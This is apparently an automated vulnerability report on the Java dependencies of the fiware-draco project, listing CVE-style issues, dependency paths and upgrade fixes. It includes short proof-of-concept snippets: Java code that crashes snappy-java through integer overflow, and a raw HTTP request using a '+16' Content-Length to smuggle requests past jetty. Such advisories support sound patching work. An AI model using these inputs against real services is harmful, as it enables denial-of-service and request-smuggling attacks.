  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Observable Discrepancy due to the timing difference between exceptions thrown when processing RSA key exchange handshakes, AKA Marvin.

Note: The implemented fix mitigates the leakage of data via the PKCS#1 interface, but does not fully alleviate the side-channel as it allows cases in which the padding check fails but the handshake succeeds.

Remediation

There is no fixed version for org.bouncycastle:bcprov-jdk15on.

References

medium severity

Integer Overflow or Wraparound

  • Vulnerable module: org.xerial.snappy:snappy-java
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.avro:avro@1.9.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3

Overview

Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the shuffle(int[] input) function due to improper validation of the multiplications done on the input length. Exploiting this vulnerability is possible by passing negative, zero, float, very small, or very long values to the shuffle functions, which later on are multiplicated by four. A successful exploration results in “java.lang.ArrayIndexOutOfBoundsException" or “java.lang.NegativeArraySizeException” exceptions which can crash the program.

PoC

package org.example;
import org.xerial.snappy.BitShuffle;

import java.io.*;


public class Main {

    public static void main(String[] args) throws IOException {
        int[] original = new int[0x40000000];
        byte[] shuffled = BitShuffle.shuffle(original);
        System.out.println(shuffled[0]);
    }
}

The program will crash, showing the following error (or similar):

Exception in thread "main" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0
    at org.example.Main.main(Main.java:12)

Process finished with exit code 1

Remediation

Upgrade org.xerial.snappy:snappy-java to version 1.1.10.1 or higher.

References

medium severity

Integer Overflow or Wraparound

  • Vulnerable module: org.xerial.snappy:snappy-java
  • Introduced through: org.apache.avro:avro@1.8.1, org.apache.nifi:nifi-avro-record-utils@1.15.3 and others

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.avro:avro@1.9.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 org.xerial.snappy:snappy-java@1.1.1.3
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-database-utils@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-record-serialization-services@1.15.3 org.apache.nifi:nifi-avro-record-utils@1.15.3 org.apache.avro:avro@1.8.1 org.xerial.snappy:snappy-java@1.1.1.3

Overview

Affected versions of this package are vulnerable to Integer Overflow or Wraparound via the function compress(char[] input) in Snappy.java due to improper validation of the array length.

Exploiting this vulnerability is possible when the “buf” array compiled by the maxCompressedLength function is successfully allocated but its size might be too small to use for the compression, causing a fatal Access Violation error.

Note: The issue most likely won’t occur when using a byte array since creating a byte array of size 0x80000000 (or any other negative value) is impossible in the first place.

PoC

package org.example;
import org.xerial.snappy.Snappy;

import java.io.*;

public class Main {

    public static void main(String[] args) throws IOException {
        char[] uncompressed = new char[0x40000000];
        byte[] compressed = Snappy.compress(uncompressed);
    }
}

Remediation

Upgrade org.xerial.snappy:snappy-java to version 1.1.10.1 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.google.protobuf:protobuf-java
  • Introduced through: com.google.protobuf:protobuf-java@2.5.0 and org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to com.google.protobuf:protobuf-java@3.16.3.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.google.protobuf:protobuf-java@2.5.0
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-api@3.3.1 com.google.protobuf:protobuf-java@2.5.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.1.

Overview

com.google.protobuf:protobuf-java is a Google's language-neutral, platform-neutral, extensible mechanism for serializing structured data.

Affected versions of this package are vulnerable to Denial of Service (DoS) via the parsing procedure for binary and text format data. Input streams containing multiple instances of non-repeated embedded messages with repeated or unknown fields cause objects to be converted back and forth between mutable and immutable forms, resulting in potentially long garbage collection pauses.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.google.protobuf:protobuf-java to version 3.16.3, 3.19.6, 3.20.3, 3.21.7 or higher.

References

medium severity

Information Exposure

  • Vulnerable module: io.netty:netty-common
  • Introduced through: org.apache.nifi:nifi-processor-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-buffer@4.1.69.Final io.netty:netty-common@4.1.69.Final
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-processor-utils@1.15.3 org.apache.nifi:nifi-event-transport@1.15.3 io.netty:netty-handler@4.1.69.Final io.netty:netty-codec@4.1.69.Final io.netty:netty-transport@4.1.69.Final io.netty:netty-resolver@4.1.69.Final io.netty:netty-common@4.1.69.Final

Overview

Affected versions of this package are vulnerable to Information Exposure due to an incomplete fix to CVE-2021-21290, which still allowed one exploitable path. When netty's multipart decoders are used, local information disclosure can occur via the local system temporary directory, if temporary storing uploads on the disk is enabled. Note: To be vulnerable, a victim application has to run on a Unix-like operating system, and with Java 6 or below.

Remediation

Upgrade io.netty:netty-common to version 4.1.77.Final or higher.

References

medium severity

Uncontrolled Resource Consumption ('Resource Exhaustion')

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Uncontrolled Resource Consumption ('Resource Exhaustion') within the org.bouncycastle.openssl.PEMParser class. Parsing a file that has crafted ASN.1 data through the PEMParser causes an OutOfMemoryError.

Workaround

The attack can be avoided by filtering PEM requests containing EXTERNAL tagged encodings.

Remediation

There is no fixed version for org.bouncycastle:bcprov-jdk15on.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: com.fasterxml.woodstox:woodstox-core
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-common@3.3.1 com.fasterxml.woodstox:woodstox-core@5.3.0
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.3.5.

Overview

Affected versions of this package are vulnerable to Denial of Service (DoS). If the parser is running on user supplied input, an attacker may supply content that causes the parser to crash by stack overflow.

NOTE: This vulnerability was originally reported five times and received five CVE IDs. These have since been corrected to be duplicate references to the same issue.

Details

Denial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.

Unlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.

One popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.

When it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.

Two common types of DoS vulnerabilities:

  • High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, commons-fileupload:commons-fileupload.

  • Crash - An attacker sending crafted requests that could cause the system to crash. For Example, npm ws package

Remediation

Upgrade com.fasterxml.woodstox:woodstox-core to version 5.4.0, 6.4.0 or higher.

References

medium severity

Allocation of Resources Without Limits or Throttling

  • Vulnerable module: org.bouncycastle:bcprov-jdk15on
  • Introduced through: org.apache.nifi:nifi-security-utils@1.15.3 and org.apache.nifi:nifi-socket-utils@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-socket-utils@1.15.3 org.apache.nifi:nifi-security-utils@1.15.3 org.bouncycastle:bcpkix-jdk15on@1.70 org.bouncycastle:bcutil-jdk15on@1.70 org.bouncycastle:bcprov-jdk15on@1.70

Overview

org.bouncycastle:bcprov-jdk15on is a Java implementation of cryptographic algorithms.

Affected versions of this package are vulnerable to Allocation of Resources Without Limits or Throttling in the solveQuadraticEquation() function used for certificate verification in ECCurve.java. Passing a large f2m parameter can cause excessive CPU consumption.

Remediation

There is no fixed version for org.bouncycastle:bcprov-jdk15on.

References

medium severity

Improper Handling of Length Parameter Inconsistency

  • Vulnerable module: org.eclipse.jetty:jetty-http
  • Introduced through: org.apache.hadoop:hadoop-client@3.3.1 and org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlets@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.hadoop:hadoop-client@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-jobclient@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-common@3.3.1 org.apache.hadoop:hadoop-mapreduce-client-core@3.3.1 org.apache.hadoop:hadoop-yarn-client@3.3.1 org.eclipse.jetty.websocket:websocket-client@9.4.40.v20210413 org.eclipse.jetty:jetty-client@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.hadoop:hadoop-client@3.4.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-deploy@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:apache-jsp@9.4.44.v20210927 org.eclipse.jetty:jetty-annotations@9.4.44.v20210927 org.eclipse.jetty:jetty-plus@9.4.44.v20210927 org.eclipse.jetty:jetty-webapp@9.4.40.v20210413 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927 org.eclipse.jetty:jetty-http@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.24.0.

Overview

org.eclipse.jetty:jetty-http is an is a http module for jetty server.

Affected versions of this package are vulnerable to Improper Handling of Length Parameter Inconsistency via the HttpParser.java component due to accepting the + character proceeding the content-length value in a HTTP/1 header field. An attacker can use jetty in combination with a server that does not close the connection after rejecting such request and after sending a 400 response. This could result in request smuggling.

PoC

 POST / HTTP/1.1
 Host: a.com
 Content-Length: +16
 Connection: close
 ​
 0123456789abcdef

Remediation

Upgrade org.eclipse.jetty:jetty-http to version 9.4.52.v20230823, 10.0.16, 11.0.16, 12.0.1 or higher.

References

medium severity

Denial of Service (DoS)

  • Vulnerable module: org.eclipse.jetty:jetty-server
  • Introduced through: org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3

Detailed paths

  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
  • Introduced through: ging/fiware-draco@ging/fiware-draco#a4662f421b88e6d68b82c68c73679ad4e29540f4 org.apache.nifi:nifi-mongodb-client-service-api-nar@1.15.3 org.apache.nifi:nifi-standard-services-api-nar@1.15.3 org.apache.nifi:nifi-jetty-bundle@1.15.3 org.eclipse.jetty:jetty-servlet@9.4.40.v20210413 org.eclipse.jetty:jetty-security@9.4.40.v20210413 org.eclipse.jetty:jetty-server@9.4.44.v20210927
    Remediation: Upgrade to org.apache.nifi:nifi-mongodb-client-service-api-nar@1.21.0.
